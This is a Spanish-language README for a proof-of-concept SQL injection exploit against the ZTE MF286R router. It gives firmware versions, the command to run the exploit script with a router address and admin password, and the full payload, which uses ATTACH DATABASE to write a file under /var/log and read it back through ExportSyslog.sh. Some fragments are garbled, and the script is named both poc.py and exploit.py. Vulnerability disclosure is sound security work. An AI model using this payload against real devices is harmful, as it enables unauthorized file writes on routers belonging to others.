
Prueba de concepto de la vulnerabilidad de inyección SQL que afecta al router ZTE MF286R.
Detalles del firmware:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)La vulnerabilidad es una inyección SQL presente en el manejador PHONE_BLOCK_ADD en el servidor web binario goahead.
Posibles explotaciones:
rw- si este archivo no existeEl PoC para esta vulnerabilidad está presente en este directorio; asegúrese de que los syslogs no estén habilitados porque necesitamos que el archivo no exista. Use el script poc.py con el siguiente comando:
$ python3 exploit.py http://<router> <admin_password>
Muestra cómo un atacante puede escribir un archivo; en este caso, escribiré un archivo en /var/log/webshow_messages (registro web) y obtendré el archivo escrito a través de cgi-bin/ExportSyslog.sh.
Básicamente, el script usa el payload test'); ATTACH DATABASE '/var/log/webshow_messages' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestestest');--"
https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1027744